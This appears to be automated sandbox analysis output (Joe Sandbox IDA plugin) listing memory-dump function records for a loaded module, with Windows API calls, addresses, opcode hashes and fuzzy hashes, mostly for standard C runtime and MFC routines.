                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                        • String ID: csm
                                        • API String ID: 2163707966-1018135373
                                        • Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                        • Instruction ID: 8237ebe18a3a16eef7a8d659115c89cab8b66e68290a06dfd3e9d0fcc92f85ab
                                        • Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
                                        • Instruction Fuzzy Hash: A4014632901229BBDF125F64CC48EEA3FAAFF48358F204015FC1814160D732E9B1EBA1
                                        APIs
                                        • GetModuleHandleA.KERNEL32(KERNEL32,6FE377D7), ref: 6FE3ED7C
                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FE3ED8C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                        • API String ID: 1646373207-3105848591
                                        • Opcode ID: 05e0d11d65f7875771f62e99e2de6f8a1cf327d980164b0412c2dad1008b6b50
                                        • Instruction ID: b7aeb5e6aefbbc2bb4e4841537f18ed2c397cd91df62c0a12de7c0a14b50776b
                                        • Opcode Fuzzy Hash: 05e0d11d65f7875771f62e99e2de6f8a1cf327d980164b0412c2dad1008b6b50
                                        • Instruction Fuzzy Hash: 94F09031940E09D2EF002FB1AD0D2AF7F79BB82756F920899E192A0584CF3094B9D385
                                        APIs
                                        • ___addlocaleref.LIBCMT ref: 6FE4054E
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(6FE4C168), ref: 6FE40426
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000000), ref: 6FE40433
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000048), ref: 6FE40440
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(C0590000), ref: 6FE4044D
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000000), ref: 6FE4045A
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000000), ref: 6FE40476
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(6FE23790), ref: 6FE40486
                                          • Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(-000000B4), ref: 6FE4049C
                                        • ___removelocaleref.LIBCMT ref: 6FE40559
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(6FE4095F), ref: 6FE404BD
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(0FFFFF7C), ref: 6FE404CA
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(558AF44D), ref: 6FE404D7
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(8B0C45B6), ref: 6FE404E4
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(831E751D), ref: 6FE404F1
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(831E751D), ref: 6FE4050D
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(5E166AFF), ref: 6FE4051D
                                          • Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(45234050), ref: 6FE40533
                                        • ___freetlocinfo.LIBCMT ref: 6FE4056D
                                          • Part of subcall function 6FE402CB: ___free_lconv_mon.LIBCMT ref: 6FE40311
                                          • Part of subcall function 6FE402CB: ___free_lconv_num.LIBCMT ref: 6FE40332
                                          • Part of subcall function 6FE402CB: ___free_lc_time.LIBCMT ref: 6FE403B7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                                        • String ID: P)o
                                        • API String ID: 467427115-3185942622
                                        • Opcode ID: 1da9b296e53a0e2b3653e30566cbd7932ea7bb139107a402692f62af805f4ed5
                                        • Instruction ID: 40b8c99438ad5c1dac40b2acb52c7f4a5a7629892c06e5761522ba5870bebd47
                                        • Opcode Fuzzy Hash: 1da9b296e53a0e2b3653e30566cbd7932ea7bb139107a402692f62af805f4ed5
                                        • Instruction Fuzzy Hash: 2EE04832901921458B33192874106E95E54EFE1639F31217FE670A7394DB28AA416099
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: File$SizeTime_memset
                                        • String ID:
                                        • API String ID: 151880914-0
                                        • Opcode ID: 5a1ad17a43a58817871abb52d2ee8099d5c5f955459e531afc36fe16550cb373
                                        • Instruction ID: b80f78db319817b744eeb8e9cd8536904081dc37a193950c01d705c90d5c0418
                                        • Opcode Fuzzy Hash: 5a1ad17a43a58817871abb52d2ee8099d5c5f955459e531afc36fe16550cb373
                                        • Instruction Fuzzy Hash: 80510B765047059FDB20DF68C9419AABBF8FF09324B204A2EE4A6D3690E734F945CB60
                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FE4084F
                                        • __isleadbyte_l.LIBCMT ref: 6FE40883
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,6FE340D8,6FE4BF84,00000000,00000000,?,?,?,?,6FE340D8,00000000,?), ref: 6FE408B4
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,6FE340D8,00000001,00000000,00000000,?,?,?,?,6FE340D8,00000000,?), ref: 6FE40922
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 6c2d4c45d7c9ed5736aa65c9f3a23f6bd79903b6df5ed1f12244550f0f93592b
                                        • Instruction ID: 17a62a6edb3bf4a12a512c868a0c3f59729f83752cce13b4325bc14fe0107cc2
                                        • Opcode Fuzzy Hash: 6c2d4c45d7c9ed5736aa65c9f3a23f6bd79903b6df5ed1f12244550f0f93592b
                                        • Instruction Fuzzy Hash: 47311631904245EFDB00DF64E9809AE7FB5FF55324F21457EE6649B291E330E941DB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __msize_malloc
                                        • String ID:
                                        • API String ID: 1288803200-0
                                        • Opcode ID: eb3e2951c29db2cb9528be8e25198baf33442950c28f2f23aac9eb8d56726605
                                        • Instruction ID: 92e8eae19c24cbccf7cea34e0079fff3ac17780f3d3f6e8d1bf7231b326cf7c2
                                        • Opcode Fuzzy Hash: eb3e2951c29db2cb9528be8e25198baf33442950c28f2f23aac9eb8d56726605
                                        • Instruction Fuzzy Hash: 45216671640B109FDB159F3CD48499A7FE5AF44778B30891FD8298B294FB70E891CA84
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6FE28ED0
                                          • Part of subcall function 6FE29C7C: __EH_prolog3.LIBCMT ref: 6FE29C83
                                        • __wcsdup.LIBCMT ref: 6FE28EF2
                                        • GetCurrentThread.KERNEL32 ref: 6FE28F1F
                                        • GetCurrentThreadId.KERNEL32 ref: 6FE28F28
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CurrentH_prolog3Thread$__wcsdup
                                        • String ID:
                                        • API String ID: 190065205-0
                                        • Opcode ID: 85066225f549823919afc7f3f0d892077d0424132788612a511ae7c2fcca1835
                                        • Instruction ID: fa76569da06a6e69e67931218bc6b270dc00e26f59999577504663b1d9f8505f
                                        • Opcode Fuzzy Hash: 85066225f549823919afc7f3f0d892077d0424132788612a511ae7c2fcca1835
                                        • Instruction Fuzzy Hash: DD2179B0904B548ED7219F6A854524AFFE8BFA4704F20891FD1AA87B61EBB0A245CF41
                                        APIs
                                        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FE31D33
                                        • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FE31D5E
                                        • GetCapture.USER32 ref: 6FE31D70
                                        • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FE31D7F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: MessageSend$Capture
                                        • String ID:
                                        • API String ID: 1665607226-0
                                        • Opcode ID: 6d47f7f521c493ecf6c17507a866533847f28e7d5b6db2fb7dbb1d0b9fc5e8b6
                                        • Instruction ID: 75a0c167743c4eafdb0c7190b7c4e74027d18ff3f79c2ad3a3d15d13a812a305
                                        • Opcode Fuzzy Hash: 6d47f7f521c493ecf6c17507a866533847f28e7d5b6db2fb7dbb1d0b9fc5e8b6
                                        • Instruction Fuzzy Hash: 390175327402947BDE305BA28CCCFEB3E79DFCAB15F21007CB6049A1E6CA918400D620
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6FE26A8A
                                          • Part of subcall function 6FE268E2: _malloc.LIBCMT ref: 6FE26900
                                        • __CxxThrowException@8.LIBCMT ref: 6FE26AC0
                                        • FormatMessageW.KERNEL32(00001100,00000000,6FE4C050,00000800,000000FF,00000000,00000000,?,?,6FE4D898,00000004,6FE216A6,?,6FE2155A,8007000E,6FE213DE), ref: 6FE26AEA
                                        • LocalFree.KERNEL32(000000FF,000000FF,6FE2279F), ref: 6FE26B12
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
                                        • String ID:
                                        • API String ID: 1776251131-0
                                        • Opcode ID: 13854e6d0d9f848f673a66acc8e51b97a691111cae04d845a04246301de436d2
                                        • Instruction ID: 1e22f2720480bb254be54d7e116bf62e881f3c358fc1fbed0adb2353e5bbad6a
                                        • Opcode Fuzzy Hash: 13854e6d0d9f848f673a66acc8e51b97a691111cae04d845a04246301de436d2
                                        • Instruction Fuzzy Hash: 67114C71604349AFDF049F68CC449A93FF5EF8A714F30C62DF5258A2E0E7319A519B54
                                        APIs
                                        • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FE2D194
                                        • RegCloseKey.ADVAPI32(00000000), ref: 6FE2D19D
                                        • swprintf.LIBCMT ref: 6FE2D1BA
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FE2D1CB
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ClosePrivateProfileStringValueWriteswprintf
                                        • String ID:
                                        • API String ID: 22681860-0
                                        • Opcode ID: 284390bef0d408fa35b0d68007ff830028bf60f91674a181b7a8d44189fe700f
                                        • Instruction ID: aa9890ff741d6c3907858d4d4517f27dc9e4efa5a2a8512af6b23311208321e4
                                        • Opcode Fuzzy Hash: 284390bef0d408fa35b0d68007ff830028bf60f91674a181b7a8d44189fe700f
                                        • Instruction Fuzzy Hash: 3401C876500709BBDB10AF648C45FAF7BEDAF4A714F10041AFA00A7280DB75ED15C7A0
                                        APIs
                                          • Part of subcall function 6FE268E2: _malloc.LIBCMT ref: 6FE26900
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FE272BB
                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 6FE272C1
                                        • DuplicateHandle.KERNEL32(00000000), ref: 6FE272C4
                                        • GetLastError.KERNEL32(?), ref: 6FE272DF
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                        • String ID:
                                        • API String ID: 3704204646-0
                                        • Opcode ID: b5cdc3edd32dbb16e172e7c09fad5c26c50e0ecd55291a8e80d9cf33d0ba539a
                                        • Instruction ID: f031afc4f5a7a1d5afe00621b21706bb5aeac44dce62b7d909db7e0027a5722f
                                        • Opcode Fuzzy Hash: b5cdc3edd32dbb16e172e7c09fad5c26c50e0ecd55291a8e80d9cf33d0ba539a
                                        • Instruction Fuzzy Hash: 3C014472600605ABDB009BA5CD89F5A7FE9EFC5764F244519F505DB280EB71ED018BA0
                                        APIs
                                        • GetTopWindow.USER32(?), ref: 6FE30F9D
                                        • GetTopWindow.USER32(00000000), ref: 6FE30FDC
                                        • GetWindow.USER32(00000000,00000002), ref: 6FE30FFA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window
                                        • String ID:
                                        • API String ID: 2353593579-0
                                        • Opcode ID: 32d9cd91f0b138aaca8306c8d0b6ae205f60c4a658d48b7668b0a8322b07bfda
                                        • Instruction ID: b1d4e8483006ef8982a1a4fae855cb7b1f63c3757affddcfda7371601c4db787
                                        • Opcode Fuzzy Hash: 32d9cd91f0b138aaca8306c8d0b6ae205f60c4a658d48b7668b0a8322b07bfda
                                        • Instruction Fuzzy Hash: 9801293340862ABBCF026E958C0CEEF3F26AF4A7A8F154025FA1055160C736C572EBA1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                        • Instruction ID: c142487e8c4ec9899bd0547f19d92bd9afeca5afd6d7e87dd131cfa6ce6bee21
                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                        • Instruction Fuzzy Hash: 1A11837380069EBBCF125F84CD05CDD3F62BB48358B258415FA2858170C732DAB6EB82
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 6FE303DC
                                        • GetTopWindow.USER32(00000000), ref: 6FE303EF
                                          • Part of subcall function 6FE303CF: GetWindow.USER32(00000000,00000002), ref: 6FE30436
                                        • GetTopWindow.USER32(?), ref: 6FE3041F
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Window$Item
                                        • String ID:
                                        • API String ID: 369458955-0
                                        • Opcode ID: 700a9ba022c2d07b05953a95c950249fe136d69bb7e3227b9aa18fed98f3c044
                                        • Instruction ID: c751168d5c98641c5149c2a7dd66ba597997ba06d7a9b767be9da0aec4013e67
                                        • Opcode Fuzzy Hash: 700a9ba022c2d07b05953a95c950249fe136d69bb7e3227b9aa18fed98f3c044
                                        • Instruction Fuzzy Hash: 98018833905A35678B122E618D0CE8F3F6AAF453ACF62E125FF1455101E731D722C6D5
                                        APIs
                                        • __getptd.LIBCMT ref: 6FE40586
                                          • Part of subcall function 6FE3A27F: __getptd_noexit.LIBCMT ref: 6FE3A282
                                          • Part of subcall function 6FE3A27F: __amsg_exit.LIBCMT ref: 6FE3A28F
                                        • __getptd.LIBCMT ref: 6FE4059D
                                        • __amsg_exit.LIBCMT ref: 6FE405AB
                                        • __lock.LIBCMT ref: 6FE405BB
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                        • String ID:
                                        • API String ID: 3521780317-0
                                        • Opcode ID: 26370125d81e536a8758f622388bb905d23de6fe538cee36978827f41e070221
                                        • Instruction ID: afa90daea4704bc8cabb8f6f735690237c152308b0193a7026be9001ae6b1381
                                        • Opcode Fuzzy Hash: 26370125d81e536a8758f622388bb905d23de6fe538cee36978827f41e070221
                                        • Instruction Fuzzy Hash: E6F06D33D40720CBDB20ABA8A409B587EA0AF60728F71156ED560A73E1CB39A941CB52
                                        APIs
                                          • Part of subcall function 6FE2A59C: GetModuleHandleW.KERNEL32(KERNEL32,6FE2A6B6), ref: 6FE2A5AA
                                          • Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6FE2A5CB
                                          • Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6FE2A5DD
                                          • Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(ActivateActCtx), ref: 6FE2A5EF
                                          • Part of subcall function 6FE2A59C: GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6FE2A601
                                        • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FE2A6D0
                                        • SetLastError.KERNEL32(0000006F), ref: 6FE2A6E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true
                                        • Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AddressProc$Module$ErrorFileHandleLastName
                                        • String ID:
                                        • API String ID: 2524245154-3916222277
                                        • Opcode ID: 6cb752efe9e69c43e189ae4566d0193ec339ab21aa986f1df19f0e5b3a85ca3f
                                        • Instruction ID: 36eb88a9189be133cfd63b66aeac8cf97b3d6ebe2efbda2f3df17c184506b48e
                                        • Opcode Fuzzy Hash: 6cb752efe9e69c43e189ae4566d0193ec339ab21aa986f1df19f0e5b3a85ca3f
                                        • Instruction Fuzzy Hash: B3217C7084161C9ECB20DF70C8487DABBF4BF05728F20869EC069D62C0EB74AA89DF54
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6FE28E78
                                        • PathFindExtensionW.SHLWAPI(?), ref: 6FE28E8E
                                          • Part of subcall function 6FE28BDF: __EH_prolog3_GS.LIBCMT ref: 6FE28BE9
                                          • Part of subcall function 6FE28BDF: GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6FE28EB7,?,?), ref: 6FE28C19
